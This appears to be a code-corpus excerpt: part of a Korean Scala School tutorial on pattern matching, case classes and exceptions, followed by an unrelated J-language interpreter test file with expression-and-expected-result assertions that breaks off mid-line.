println("the color is: " + com.twitter.example.colorHolder.BLUE) </pre> 여러분이 이렇게 객체를 정의하면 스칼라 repl은 다음과 같이 표시해준다. <pre> scala> object colorHolder { | val Blue = "Blue" | val Red = "Red" | } defined module colorHolder </pre> 모듈이라고 repl이 응답하는 것에 유의하라. 이는 스칼라 언어를 설계시 객체를 모듈 시스템의 일부로 생각하고 설계했음을 보여준다. h2(#match). 패턴 매칭 패턴 매치는 스칼라에서 가장 유용한 기능 중 하나이다. 값에 대해 매칭할 수 있다. <pre> val times = 1 times match { case 1 => "one" case 2 => "two" case _ => "some other number" } </pre> 가드(조건문)를 사용해 매칭할 수 있다. <pre> times match { case i if i == 1 => "one" case i if i == 2 => "two" case _ => "some other number" } </pre> 변수 'i'에 어떻게 값을 잡아 넣었는지 주의깊게 살펴보라. 마지막 경우의 <code>_</code>는 와일드카드이다. 즉, 모든 경우를 처리한다. 만약 이 부분이 없다면 매치되지 않는 값이 들어온 경우 런타임 에러가 발생할 것이다. 이에 대해서는 나중에 살펴보겠다. *See Also* 효율적인 스칼라에서 <a href="https://twitter.github.com/effectivescala/#Functional programming-Pattern matching">패턴매치를 사용해야 하는 경우</a>와 <a href="https://twitter.github.com/effectivescala/#Formatting-Pattern matching">패턴 매칭을 어떤 형식으로 할지</a>에 대해 설명한다. 스칼라 여행에서도 <a href="https://www.scala-lang.org/node/120">패턴매칭</a>을 다룬다. h3. 타입에 대해 매치시키기 <code>match</code>를 사용해 타입이 다른 값을 서로 다른 방식으로 처리 가능하다. <pre> def bigger(o: Any): Any = { o match { case i: Int if i < 0 => i - 1 case i: Int => i + 1 case d: Double if d < 0.0 => d - 0.1 case d: Double => d + 0.1 case text: String => text + "s" } } </pre> h3. 클래스 멤버에 대해 매치시키기 앞에서 봤던 계산기 예제를 다시 떠올려보자. 타입(계산기의 유형)에 따라 계산기를 구분하자. <pre> def calcType(calc: Calculator) = calc match { case calc.brand == "HP" && calc.model == "20B" => "financial" case calc.brand == "HP" && calc.model == "48G" => "scientific" case calc.brand == "HP" && calc.model == "30B" => "business" case _ => "unknown" } </pre> 아이구, 힘들어 죽겄다. 스칼라는 이런 처리를 쉽게 할 수 있는 도구를 제공한다. h2(#caseclass). 케이스 클래스(case class) 케이스 클래스는 손쉽게 내용을 어떤 클래스에 저장하고, 그에 따라 매치를 하고 싶은 경우 사용한다. new를 사용하지 않고도 케이스 클래스의 인스턴스 생성이 가능하다. <pre> scala> case class Calculator(brand: String, model: String) defined class Calculator scala> val hp20b = Calculator("HP", "20b") hp20b: Calculator = Calculator(hp,20b) </pre> 케이스 클래스는 자동으로 생성자 인자에 따른 동등성 검사를 제공하며, 또한 보기 좋은 toString 메소드도 제공한다. <pre> scala> val hp20b = Calculator("HP", "20b") hp20b: Calculator = Calculator(hp,20b) scala> val hp20B = Calculator("HP", "20b") hp20B: Calculator = Calculator(hp,20b) scala> hp20b == hp20B res6: Boolean = true </pre> 케이스 클래스 안에도 일반 클래스와 똑같이 메소드를 정의할 수 있다. h6. 케이스 클래스와 패턴 매칭 케이스 클래스는 패턴 매치와 사용하기 위해 설계된 것이다. 앞의 계산기 분류 예제를 간략하게 만들어보자. <pre> val hp20b = Calculator("HP", "20B") val hp30b = Calculator("HP", "30B") def calcType(calc: Calculator) = calc match { case Calculator("HP", "20B") => "financial" case Calculator("HP", "48G") => "scientific" case Calculator("HP", "30B") => "business" case Calculator(ourBrand, ourModel) => "Calculator: %s %s is of unknown type".format(ourBrand, ourModel) } </pre> 마지막 매치는 다음과 같이 쓸 수도 있다. <pre> case Calculator(_, _) => "Calculator of unknown type" </pre> 혹은, 그냥 calc가 계산기인지 아닌지도 명시하지 않아도 된다. <pre> case _ => "Calculator of unknown type" </pre> 아니면, 매치된 값에 다른 이름을 붙일 수도 있다. <pre> case c@Calculator(_, _) => "Calculator: %s of unknown type".format(c) </pre> h2(#exception). 예외 스칼라에서는 예외 처리시 try-catch-finally 문법에 패턴 매치를 사용할 수 있다. <pre> try { remoteCalculatorService.add(1, 2) } catch { case e: ServerIsDownException => log.error(e, "the remote calculator service is unavailble. should have kept your trustry HP.") } finally { remoteCalculatorService.close() } </pre> <code>try</code> 역시 식 중심의 구문이다. <pre> val result: Int = try { remoteCalculatorService.add(1, 2) } catch { case e: ServerIsDownException => { log.error(e, "the remote calculator service is unavailble. should have kept your trustry HP.") 0 } } finally { remoteCalculatorService.close() } </pre> 이렇게 하는게 좋은 프로그램 스타일은 아니다. 위 내용은 단지 다른 대부분의 스칼라 구성 요소와 마찬가지로 try-catch-finally도 결과값을 내는 식임을 보여주기 위한 예일 뿐이다. finally는 예외가 처리(catch)된 다음에 실행될 것이다. 이 부분은 전체 식의 일부가 아니다. 예외가 발생하지 않으면 try {} 안의 마지막 식의 값이 try-catch-finally 전체의 값이 되고, 예외가 발생하는 경우에는 catch 안의 식의 값이 전체 식의 최종 값이 된다.
Textile
5
AstronomiaDev/scala_school
web/ko/basics2.textile
[ "Apache-2.0" ]
NB. prefix lines with !B to set a breakpoint and launch debuger (1+2) -: 3 NB. add (1.5 + 2.5) -: 4 NB. add float (4.5 + 3) -: 7.5 NB. add float + int 1 -: 4 - 3 NB. subtract 1.5 -: 4.5 - 3 NB. subtract float - int 0.5 -: 4 - 3.5 NB. subtract int - float _1 -: 5 - 6 NB. subtract negative 6 -: 2 * 3 NB. multiply int 6.25 -: 2.5 * 2.5 NB. multiply float 5 -: 2 * 2.5 NB. multiply int*float 5 -: 10 % 2 NB. divide int 0.25 -: 1 % 4 NB. divide float 0 1 2 -: i. 3 NB. iota simple 2 1 0 -: i. _3 NB. iota simple negative '3 2\n1 0' -: i. _2 _2 NB. iota negative array '2 1 0\n5 4 3\n8 7 6' -: i. 3 _3 NB. iota negative mixed 3=$ i. 3 NB. shape iota simple (3 3 3) -: 3 $ 3 NB. reshape int '3 3 3\n3 3 3' -: (2 3 $ 3) NB. reshape int (3 $ 3.2) -: (3.2 3.2 3.2) NB. reshape double (3 2 $ 'abc') -: 'ab\nca\nbc' NB. reshape string (+/ i. 4) -: 6 NB. adverb simple (+/ i. 2 3) -: 3 5 7 NB. multi-dimensional sum (i. 2 3) -: '0 1 2\n3 4 5' NB. multi-dimensional (i. 2 2 2) -: '0 1\n2 3\n\n4 5\n6 7' NB. multi-dimensional 2 (1 + i. 2 2) -: '1 2\n3 4' NB. multi-dimensional add (+/ i. 2 3) -: (3 5 7) NB. multi-dimensional sum (+/ i. 2 2 2) -: '4 6\n8 10' NB. multi-dimensional sum higher rank (+/ i. 4 3 2) -: '36 40\n44 48\n52 56' NB. multi-dimensional sum higher rank 2 (a + a=:5) -: 10 NB. assignment (*/ 2 2 2) -: 8 NB. */ int (+/ 2.5 2.5) -: 5 NB. +/ 2.5 2.5 (|: i. 2 3) -: '0 3\n1 4\n2 5' NB. transpose (3 = 3) -: 1 NB. equals true (3 = 2) -: 0 NB. equals false (3.2 = 2.2) -: 0 NB. equals float false (3.2 = 3.2) -: 1 NB. equals float true ('abc' = 'abc') -: 1 NB. equals string ('abc' = 'abb') -: 0 NB. equals string false (( 0 1 2 ) = i. 3) -: 1 1 1 NB. equals array (( 0 1 3 ) = i. 3) -: 1 1 0 NB. equals array false (1 $ 'abc') -: 'a' NB. 1 $ 'abc' NB. ($ '') -: 0 NB. shape empty - $ '' ($ 2 2 $ 'abcd') -: 2 2 NB. shape string $ 2 2 $ 'abcd' (# 1) -: 1 NB. tally (# i. 5) -: 5 NB. tally i. (# i. 5 4 3) -: 5 NB. tally multidimensional (# 0 $ 0) -: 0 NB. tally empty ( 1 + _5 _6) -: _4 _5 NB. negative numbers add ($/ 1 1 5) -: 5 NB. $/ 1 1 5 ($/ 5 1 1) -: 1 1 1 1 1 NB. $/ 5 1 1 (*/ ( 1 + i. 3 )) -: 6 NB. */ 1 + i. 3 (4 $ 'ab') -: 'abab' NB. 4 $ 'ab' (0%0) -: 0 NB. 0%0' (1%0) -: '_' NB. 1%0 (a+a=:i. 2 2) -: '0 2\n4 6' NB. array + array (2 4 +/ 1 3) -: '3 5\n5 7' NB. dyadic adverb call (5 # 3) -: 3 3 3 3 3 NB. copy 5 # 3 (1 0 1 # i. 3) -: 0 2 NB. copy with boolean (1 0 1 # (3 3 $ 'abc')) -: 'abc\nabc' NB. copy with strings NB. not working (3 # i. 1 2) -: '0 1\n0 1\n0 1' NB. copy 3 # i. 1 2 NB. not working (3 # 'ab') -: 'aaabbbccc' NB. copy string ($"3 i. 3 2 1 ) -: 3 2 1 NB. rank shape full ($ $"3 i. 3 2 1 ) -: 3 NB. rank shape full 1 ($ $"2 i. 3 2 1) -: 3 2 NB. rank shape - 1 ($ $"1 i. 3 2 1) -: 3 2 1 NB. rank shape - 2 ($ #"1 i. 3 2 1) -: 3 2 NB. rank shape tally (+/"1 i. 3 3) -: 3 12 21 NB. conjunction with adverb +/ (|. i.3) -: 2 1 0 NB. reverse ints (|. 'abc') -: 'cba' NB. reverse str (|. 2 3 $ 1 2 3) -: '1 2 3\n1 2 3' NB. reverse array (|. i. 2 2 2) -: '4 5\n6 7\n\n0 1\n2 3' NB. reverse array NB. 0 : 0 'abc\n123' -: 0 : 0 abc 123 ) NB. 0 conjunction 'abc' -: (0 : 'abc') NB. explicit verb ((3 : '1+1') 0) -: 2 ((3 : 'y+1') 1) -: 2 (1 (4 : 'y+x') 1) -: 2 (_1 p: 10 20 50 100) -: 4 8 15 25 NB. Primes less than (_1 p: 17 37 79 101) -: 6 11 21 25 NB. Primes less than (prime arguments) (0 p: i. 5) -: 1 1 0 0 1 NB. is not prime (1 p: 2 3 17 79 199 3581) -: 1 1 1 1 1 1 NB. is prime (true) (1 p: 10 66 111 32331 603201 9040131) -: 0 0 0 0 0 0 NB. is prime (false) (2 p: 20) -: '2 5\n2 1' NB. factors with exponents (2 p: 120) -: '2 3 5\n3 1 1' NB. factors with 3 exponents (2 p: 20 120) -: '2 5 0\n2 1 0\n\n2 3 5\n3 1 1' NB. factors with exponents (3 p: 56) -: 2 2 2 7 NB. factorization (3 p: 56 57) -: '2 2 2 7\n3 19 0 0' NB. factorization w/fill (3 p: 6973) -: 19 367 NB. factorization (3 p: 10111) -: 1 $ 10111 NB. factorization (prime) NB. == q: (q: 567) -: 3 3 3 3 7 NB. monadic, same as 3 p: y (2 q: 100) -: 2 0 (10 q: 50302) -: 1 0 0 1 0 0 0 0 0 0 (30 q: 176346) -: 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 NB. == gamma (!) (! 5) -: 120 NB. single arg factorial (integer) (! 4.5) -: 52.3427777845536 NB. single arg factorial (floating pt) (, i. 2 2) -: 0 1 2 3 NB. ravel list $ ,1 -: 1 NB. ravel atom (2,3 4) -: (2 3 4) NB. append ('abc','123') -: 'abc123' NB. append with string ((i. 2 2) , (i.2 2)) -: '0 1\n2 3\n0 1\n2 3' NB. ravel rank > 1 ($ 1) -: '' ($ < i. 2 2) -: '' NB. simple box (< i. 3) -: 0 : 0 +-----+ |0 1 2| +-----+ ) NB. box rank > 1 (< i. 3 3) -: 0 : 0 +-----+ |0 1 2| |3 4 5| |6 7 8| +-----+ ) NB. box with rank conjunction (<"1 i. 3 2) -: 0 : 0 +---+---+---+ |0 1|2 3|4 5| +---+---+---+ ) NB. more box (< i. 2 1 1) -: 0 : 0 +-+ |0| | | |1| +-+ ) NB. box with table (<"0 i. 2 2 2) -: 0 : 0 +-+-+ |0|1| +-+-+ |2|3| +-+-+ +-+-+ |4|5| +-+-+ |6|7| +-+-+ ) NB. box with string (< (2 3 $ 'abc')) -: 0 : 0 +---+ |abc| |abc| +---+ ) NB. box with string rank conjunction (<"1 (2 3 $ 'abc')) -: 0 : 0 +---+---+ |abc|abc| +---+---+ ) NB. nested boxes ((<<"0 i.2 2),(<1)) -: 0 : 0 +-----+-+ |+-+-+|1| ||0|1|| | |+-+-+| | ||2|3|| | |+-+-+| | +-----+-+ ) NB. more nested boxes ((<<"0 i.2 2),(<<1)) -: 0 : 0 +-----+---+ |+-+-+|+-+| ||0|1|||1|| |+-+-+|+-+| ||2|3|| | |+-+-+| | +-----+---+ ) NB. rank 2 ((<"2 i. 3 3 3 3)) -: 0 : 0 +--------+--------+--------+ |0 1 2 | 9 10 11|18 19 20| |3 4 5 |12 13 14|21 22 23| |6 7 8 |15 16 17|24 25 26| +--------+--------+--------+ |27 28 29|36 37 38|45 46 47| |30 31 32|39 40 41|48 49 50| |33 34 35|42 43 44|51 52 53| +--------+--------+--------+ |54 55 56|63 64 65|72 73 74| |57 58 59|66 67 68|75 76 77| |60 61 62|69 70 71|78 79 80| +--------+--------+--------+ ) NB. raze (; (i.2 2)) -: '0 1 2 3' (; (< i. 2 2)) -: '0 1\n2 3' (; (< i. 2 2),(< i. 2 2)) -: '0 1\n2 3\n0 1\n2 3' NB. head, take ({. i. 3 4) -: 0 1 2 3 ({. 3) -: 3 ({. 3,4) -: 3 (1{. 3,4) -: 3 (2{. 3,4) -: 3,4 (2{. i. 3 3) -: '0 1 2\n3 4 5' (_1 {. i. 3 4) -: 8 9 10 11 NB. behead, drop (}. i. 3 4) -: (2 4 $ 4 5 6 7 8 9 10 11) (}. 3,4,5) -: 4,5 (2}. 3,4,5) -: (,5) (_1}. i. 3 2) -: (2 2 $ 0 1 2 3) NB. behead empty table (# (}. ,1)) -: 0 NB. i. dyadic (10 5 100 i. 5) -: 1 (10 5 100 i. 5 100) -: 1 2 (10 5 100 i. 10) -: 0 NB. floor (<. 1.2 2.7) -: 1 2 NB. ceiling (>. 1.2 2.7) -: 2 3 NB. min (4 <. 5) -: 4 NB. max (4 >. 5) -: 5 NB. simple reflex + ~ 2 -: 4 NB. key (< /. ~ 1 1 2 3 3) -: 0 : 0 +---+-+---+ |1 1|2|3 3| +---+-+---+ ) (# /. ~ 1 1 2 3 3) -: 2 1 2 < /. ~ (4 3 $ 'abcxyz') -: 0 : 0 +---+---+ |abc|xyz| |abc|xyz| +---+---+ ) NB. from (0 2 { 3 5 6 7) -: 3 6 (0 2 { 3 2 $ 2 # 1 2 3) -: '1 1\n3 3' (0 2 { 3 5 6 7) -: 3 6 ($ 0 { i. 5) -: '' NB. grade (/: ~ 4 3 1 2) -: 1 2 3 4 NB. square ((*: & *: & *: ) 4) -: 65536 ((+: & +: & +: ) 4) -: 32 ((+: & +: & *: ) 4) -: 64 NB. monadic train ((+/ % #) i. 10) -: 4.5 NB. train with adverb (({.;#) /. ~ 1 1 2 2 2) -: 0 : 0 +-+-+ |1|2| +-+-+ |2|3| +-+-+ ) NB. rank2ex 1 0 1 0 -: ((3 $ 'abc') -:"1 (4 3 $ 'abcxyz')) NB. nub (~. (1 2 3 1)) -: (1 2 3) (~. ('abc';123;'abc')) -: ('abc';123) (,. 1 2 3) -: 0 : 0 1 2 3 ) NB. right 1 ] 3 -: 3 ((1 + ]) 5) -: 6 ((1,])/i.3) -: 1 1 2 NB. stitch (1 ,. 2) -: 1 2 ((i.3) ,. (1+i.3)) -: 0 : 0 0 1 1 2 2 3 ) ($ 9,. (i.3)) -: '3 2' ($ 9,. (i.3 3)) -: '3 4' NB. stich with atom (9 ,. (i.2)) -: 0 : 0 9 0 9 1 ) NB. fork in right tine $ (1 , (1,])) /(i. 10) -: 19 NB. cap (1 ([: ] +) 5) -: 6 (1 ([: *: +) 5) -: 36 NB. curtail (}: i. 5) -: 0 1 2 3 NB. table type NB. tables - flipping dictionary into a table (flip ('abc';'xyx');(i.3);(1+i.3)) -: 0 : 0 +---+---+ |abc|xyx| |---+---| |0 |1 | |---+---| |1 |2 | |---+---| |2 |3 | +---+---+ ) NB. tables - subsetting a table (2 {. flip ('abc';'xyx');(i.3);(1+i.3)) -: 0 : 0 +---+---+ |abc|xyx| |---+---| |0 |1 | |---+---| |1 |2 | +---+---+ ) NB. tables - taking the last row of a table (_1 {. flip ('abc';'xyx');(i.3);(1+i.3)) -: 0 : 0 +---+---+ |abc|xyx| |---+---| |2 |3 | +---+---+ ) ('abc' /: flip ('abc';'xyx');(2 1 3);(1+i.3)) -: 0 : 0 +---+---+ |abc|xyx| |---+---| |1 |2 | |---+---| |2 |1 | |---+---| |3 |3 | +---+---+ ) NB. tables - sort by column name ('xyx' /: flip ('abc';'xyx');(2 1 3);(1+i.3)) -: 0 : 0 +---+---+ |abc|xyx| |---+---| |2 |1 | |---+---| |1 |2 | |---+---| |3 |3 | +---+---+ ) NB. tables - select column ((<'abc') { flip ('abc';'xyz');(1,2);(2,3)) -: 0 : 0 +---+ |abc| |---| |1 | |---| |2 | +---+ ) NB. tables - select column and row (0 { (<'abc') { flip ('abc';'xyz');(1,2);(2,3)) -: 0 : 0 +---+ |abc| |---| |1 | +---+ ) NB. tables - update a column ((flip (<'abc');(1,2)),(flip (<'abc');(3,4))) -: 0 : 0 +---+ |abc| |---| |3 | |---| |4 | +---+ ) NB. tables - add a column ((flip (<'abc');(1,2)),(flip (<'xyz');(3,4))) -: 0 : 0 +---+---+ |abc|xyz| |---+---| |1 |3 | |---+---| |2 |4 | +---+---+ ) NB. tables - add a calculated column ((flip ('a';'b');(1,2);(3,5)),('c';'a + b')) -: 0 : 0 +-+-+-+ |a|b|c| |-+-+-| |1|3|4| |-+-+-| |2|5|7| +-+-+-+ ) NB. table - filter ('a > 1' { (flip ('a';'b');(i. 4);(5+i. 4))) -: 0 : 0 +-+-+ |a|b| |-+-| |2|7| |-+-| |3|8| +-+-+ ) NB. table - filter and sort ('a' \: 'a > 1' { (flip ('a';'b');(i. 4);(5+i. 4))) -: 0 : 0 +-+-+ |a|b| |-+-| |3|8| |-+-| |2|7| +-+-+ ) NB. behead a table with a single column (+/ }. (flip (<'a');(i.10))) -: 45 NB. behead a table with multiple columns (}. (flip ('a';'b');(i. 5);(100+ i.5))) -: 0 : 0 +---------+-------------------+ |0 1 2 3 4|100 101 102 103 104| +---------+-------------------+ ) NB. sort (0 2 1 /: ('a';'c';'b') ) -: ('a';'b';'c') NB. table amend, first column as key (1 ('v';'b') } flip ('k';'v');(> 'a';'b';'c');(0 0 0)) -: 0 : 0 +-+-+ |k|v| |-+-| |a|0| |-+-| |b|1| |-+-| |c|0| +-+-+ ) NB. table amend, arbitrary key (3 ('v';0;'v') } (1 ('v';'b') } flip ('k';'v');(> 'a';'b';'c');(0 0 0))) -: 0 : 0 +-+-+ |k|v| |-+-| |a|3| |-+-| |b|1| |-+-| |c|3| +-+-+ ) NB. table - footer ((('k';'# k'),.('v';'+/ v')) _1 } flip ('k';'v');(> 'a';'b';'c');(5 10 15)) -: 0 : 0 +-+--+ |k|v | |-+--| |a|5 | |-+--| |b|10| |-+--| |c|15| |-+--| |3|30| +-+--+ ) NB. table - key without expressions ((<'k') ] /. flip ('k';'v');( 10 1 $ 'ab');(i.10)) -: 0 : 0 +-+-+ |k|v| |-+-| |a|5| |-+-| |b|5| +-+-+ ) NB. table - key without expressions ((<'k') ] /. flip ('k';'v');( 10 1 $ 'ab');(i.10)) -: 0 : 0 +-+-+ |k|v| |-+-| |a|5| |-+-| |b|5| +-+-+ ) NB. table - key filtered table ((<'k') ] /. ('k= ''a'' ' { flip ('k';'v');( 10 1 $ 'ab');(i.10))) -: 0 : 0 +-+-+ |k|v| |-+-| |a|5| +-+-+ ) NB. table key with footer expression (('k';'k2') ] /. (('v';'+/ v') _1 } flip ('k';'k2';'v');(5 1 $ 'ab');(> 'a';'a';'a';'b';'b');(5$5))) -: 0 : 0 +-+--+--+ |k|k2|v | |-+--+--| |a|a |10| |-+--+--| |b|a |5 | |-+--+--| |b|b |5 | |-+--+--| |a|b |5 | +-+--+--+ ) NB. table key with expressions ((<'k') ('+/ v';'{. k2') /. flip ('k';'k2';'v');(5 1 $ 'ab');(> 'a';'a';'a';'b';'b');(i.5)) -: 0 : 0 +-+----+-----+ |k|+/ v|{. k2| |-+----+-----| |a|6 |a | |-+----+-----| |b|4 |a | +-+----+-----+ ) NB. amend / join with table 1 [ ages=. (1+i. 120) 1 [ ageBin =. 10 # 10 20 30 40 50 60 70 80 90 100 110 120 1 [ ageBinTable =. flip ('age';'ageBin');ages;ageBin 1 [ ageTable =. flip (<'age');(1 35 85) ageBinTable (<'age') } ageTable -: 0 : 0 +---+------+ |age|ageBin| |---+------| |1 |10 | |---+------| |35 |40 | |---+------| |85 |90 | +---+------+ ) NB. amend with table, missing values 1 [ ages=. (120#1) 1 [ ageBinTable =. flip ('age';'ageBin');ages;ageBin ageBinTable (<'age') } ageTable -: 0 : 0 +---+------+ |age|ageBin| |---+------| |1 |120 | |---+------| |35 |0 | |---+------| |85 |0 | +---+------+ ) NB. unbox a single element (> (<'foo')) -: 'foo' NB. multiple assignments ( a + b [ 'a b' =: 1 2) -: 3 (abc [ 'abc efg' =: ('abc';'efg')) -: 'abc' NB. if control structure ((3 : 'if. y > 1 do. 1 else. 0 end.') 2) -: 1 ((3 : 'if. y > 2 do. 1 else. 100 end.') 2) -: 100 ((3 : 'if. y < 2 do. ''a'' elseif. y < 100 do. ''b'' else. ''c'' end.') 50) -: 'b' NB. if in explicit iftest =: 3 : 0 if. y < 2 do. 'a' elseif. y < 100 do. 'b' else. 'c' end. ) (iftest 1) -: 'a' (iftest 50) -: 'b' (iftest 101) -: 'c' iftest =: 3 : 0 if. y < 2 do. 'z' 'a' elseif. y < 100 do. 'z' 'b' else. 'z' 'c' end. ) (iftest 1) -: 'a' (iftest 50) -: 'b' (iftest 101) -: 'c' NB. iftest immediate iftest =: 3 : 0 if. y < 2 do. 'a' return. elseif. y < 100 do. 'b' return. end. elseif. y > 100 do. 'c' end. 'NO' ) (iftest 1) -: 'a' (iftest 50) -: 'b' (iftest 200) -: 'NO' ((<<0) { (('ukey';'a') } flip (('a';'b');(i.10);(10 $ 1 2)))) -: 0 : 0 +-+-+ |a|b| |-+-| |0|1| +-+-+ ) NB. behead with key (, > }. (<<0) { (('ukey';'a') } flip (('a';'b');(i.10);(10 $ 1 2)))) -: 0 1 (}. (<'a') { (<<0) { (('ukey';'a') } flip (('a';'b');(i.10);(10 $ 1 2)))) -: 0 ((<<500) { (('ukey';'a') } flip (('a';'b');(i.10);(10 $ 1 2)))) -: 0 : 0 +-+-+ |a|b| +-+-+ ) NB. key with multiple rows ((<<1) { (('key';'b') } flip (('a';'b');(i.10);(10 $ 1 2)))) -: 0 : 0 +-+-+ |a|b| |-+-| |0|1| |-+-| |2|1| |-+-| |4|1| |-+-| |6|1| |-+-| |8|1| +-+-+ ) NB. I. (2 3 I. 1) -: 0 (2 3 I. 2) -: 0 (2 3 I. 3) -: 1 (2 3 I. 1 2 3) -: 0 0 1 NB. rank on table ((3 : '# y') (flip ('a';'b');(i.10);(10 $ 1 2))) -: 10 ($ (3 : '# y') (flip ('a';'b');(i.10);(10 $ 1 2))) -: '' ($ (3 : '# y') "1 (flip ('a';'b');(i.10);(10 $ 1 2))) -: 10 NB. return a box from each row of a table ((3 : ' 1;2 ') "1 (flip ('a';'b');(i.2);(2 $ 1 2))) -: 0 : 0 +-+-+ |1|2| +-+-+ |1|2| +-+-+ ) NB. return a new table per row, with a value from the original table ((3 : ' flip (''x'';''z'');0;(}. (<1) { y) ') "1 (flip ('a';'b');(i.2);(2 2 $ 'abc'))) -: 0 : 0 +-+--+ |x|z | |-+--| |0|ab| |-+--| |0|ca| +-+--+ ) NB. return a new table per row, with a value from the original table ((3 : ' (''a'';a+1),.(''b'';''c'') ') "1 (flip ('a';'b');(i.2);(2 2 $ 'abc'))) -: 0 : 0 +-+-+ |a|b| |-+-| |1|c| |-+-| |2|c| +-+-+ ) NB. insert or {. on table ('+/a' /. (flip ('a';'b');(i.10);(10 $ 1 2))) -: 45 (+/ ((<'a') {. (flip ('a';'b');(i.10);(10 $ 1 2)))) -: 45 ({. ((<'a') {. 0 { (flip ('a';'b');(i.10);(10 $ 1 2)))) = 0 (((<'a') {. 0 { (flip ('a';'b');(i.10);(10 $ 1 2)))) = 0 NB. importance of vectorized calcs NB. 6!:2 ' z=: ''extended_price % qty_shipped'' / InvoiceAgg ' NB. 0.0194236 NB. 6!:2 ' z2=: ( <''ASP'' ; ''extended_price % qty_shipped'') { InvoiceAgg ' NB. 4.7938795 NB. vectorized calculated columns ('a+b' / (flip ('a';'b');(i.3);(3 $ 1 2))) -: (1 3 3) NB. create a column through rank ((3 : 'flip (<''c'');(a+b))') "1 (flip ('a';'b');(i.3);(3 $ 1 2))) -: 0 : 0 +-+ |c| |-| |1| |-| |3| |-| |3| +-+ ) NB. create a column through from (((<'c';'a+b')) { (flip ('a';'b');(i.3);(3 $ 1 2))) -: 0 : 0 +-+ |c| |-| |1| |-| |3| |-| |3| +-+ ) NB. create a column through addcol (fastest) ((('addcol';'a+b') } (flip ('a';'b');(i.3);(3 $ 1 2)))) -: 0 : 0 +-+-+---+ |a|b|a+b| |-+-+---| |0|1|1 | |-+-+---| |1|2|3 | |-+-+---| |2|1|3 | +-+-+---+ ) add=: 3 : 0 a+1 ) ((3 : ' (''x''; add a ) ,. (''z''; 2 * add a)') "1 (flip ('a';'b');(i.2);(2 2 $ 'abc'))) -: 0 : 0 +-+-+ |x|z| |-+-| |1|2| |-+-| |2|4| +-+-+ ) NB. abs (| _5 10 _20) -: (5 10 20) (3!:103 flip ('a';'b';'name');(i.3);(3 $ 1 2);(3 4 $ 'abc')) -: 0 : 0 [{"a":0,"b":1,"name":"abca"},{"a":1,"b":2,"name":"bcab"},{"a":2,"b":1,"name":"cabc"}] ) ((3!:102) '[{"a":0,"b":1,"name":"abca"},{"a":1,"b":2,"name":"bcab"},{"a":2,"b":1,"name":"cabc"}]') -: 0 : 0 +-+-+----+ |a|b|name| |-+-+----| |0|1|abca| |-+-+----| |1|2|bcab| |-+-+----| |2|1|cabc| +-+-+----+ ) NB. json type promotion ((3!:102) '[{"a":1},{"a":1.2}]') -: 0 : 0 +---+ |a | |---| |1 | |---| |1.2| +---+ ) (~. flip ('a';'b');(4 2 $ 'ab');(4 $ (1,2))) -: 0 : 0 +--+-+ |a |b| |--+-| |ab|1| |--+-| |ab|2| +--+-+ ) (~. (<'a') { flip ('a';'b');(4 2 $ 'ab');(4 $ (1,2))) -: 0 : 0 +--+ |a | |--| |ab| +--+ ) NB. AND NB. (0 *. 1) -: 0 ((4!:0) ;: 'qqq 123') -: _1 0 NB. decimal types ((9!:100) 1) -: 1 (1+3)-:4 (2*6)-:12 (1%4)-:0.25 (; (1;2)) -: (1,2) ((9!:100) 0) -: 0 NB. rank support on trains (({. ,. }.)"1 (i. 3 2)) -: 0 : 0 0 1 2 3 4 5 ) NB. TODO support ,/ i. 4 3 2 NB. ('id';'col1';'col2');(> ;: 'a b c');(i.3);(i.3) NB. ([: ,/ ({. ,. }.)"1) (flip ('id';'col1';'col2');(> ;: 'a b c');(i.3);(i.3)) NB. default value for missing column ((<'b') { !. 0 (3!:102) '[{a:"1"}]') -: 0 : 0 +-+ |b| |-| |0| +-+ ) NB. found column ((<'a') { (3!:102) '[{a:"1"}]') -: 0 : 0 +-+ |a| |-| |1| +-+ ) NB. non-matching row should not blow up ('b = ''xx'' ' { (<<4) {('ukey';'a') } ((3!:102) '[{"a":1,"b":"xyz"},{"a":1.2, "b":"abc"}]')) -: 0 : 0 +-+-+ |a|b| +-+-+ ) NB. TODO add test for this keyword on rank1table NB. drop on string (5 }. '2016-01-05') -: '01-05' NB. negative index on string (_2 {. '2016-01-05') -: '05' NB. from bugfix ($ 1 { ('foo';'bar'),.('foo2';'abc')) -: (,2) NB. or (1 +. 0) -: 1 (0 +. 1) -: 1 (1 +. 1) -: 1 (0 +. 0) -: 0 (('foo' -: 'foo') +. (6 < 5)) -: 1 NB. special code to prevent infinity ((3,2,4) (%)^:(0~:])"0 (6,0,3)) -: 0.5 0 1.333333 NB. and (1 *. 0) -: 0 (0 *. 1) -: 0 (1 *. 1) -: 1 (0 *. 0) -: 0 (('foo' -: 'foo') *. (6 < 5)) -: 0 (('foo' -: 'foo') *. (5 < 6)) -: 1 NB. bug fix with math mixed and double/long, was returning 1 (((3!:102) (<'a');(1.2 2.3 3.4)),('b';'a < 2')) -: 0 : 0 +---+-+ |a |b| |---+-| |1.2|1| |---+-| |2.3|0| |---+-| |3.4|0| +---+-+ ) NB. dyadic & and [ (2 (<&0@[) 1) -: 0 (2 (<&0@[) _1) -: 0 (_5 (<&0@[) 2) -: 1 (_1 (<&0@[ +. >) 3) -: 1 (4 (<&0@[ +. >) 3) -: 1 (2 (<&0@[ +. >) 3) -: 0 NB. less than equal to (1 <: 1) -: 1 (0 <: 1) -: 1 (1.01 <: 2) -: 1 (1.01 <: 1.01) -: 1 (1.01 <: 1.00) -: 0 NB. greater than equal to (1 >: 1) -: 1 (0 >: 1) -: 0 (1.01 >: 2) -: 0 (1.01 >: 1.01) -: 1 (1.01 >: 1.00) -: 1 NB. deviation from J.. concatenate strings of different lengths ((>('hi';'bye')) & ' joe') -: (>('hi joe';'bye joe')) ('hi' & ' joe') -: 'hi joe' ('hi ' & (>'joe';'bob')) -: (>'hi joe';'hi bob') NB. running sum (+/\ 1 2 3 4) -: 1 3 6 10 NB. approximate match NB. amend / join with table 1 [ ageBinTable =. flip ('ageBin';'class');(10 20 60 150);(>('kid';'teenager';'middle age';'elderly')) 1 [ ageTable =. flip (<'age');(1 35 85) (ageBinTable ('age';'ageBin') } !. 'approx' ageTable) -: 0 : 0 +---+------+----------+ |age|ageBin|class | |---+------+----------| |1 |10 |kid | |---+------+----------| |35 |60 |middle age| |---+------+----------| |85 |150 |elderly | +---+------+----------+ ) ((<'newcol is col') { flip (<'col');(1 2 3)) -: 0 : 0 +------+ |newcol| |------| |1 | |------| |2 | |------| |3 | +------+ ) NB. bug fix count on string col ((<'k') ('# ~. k2';'{. k2') 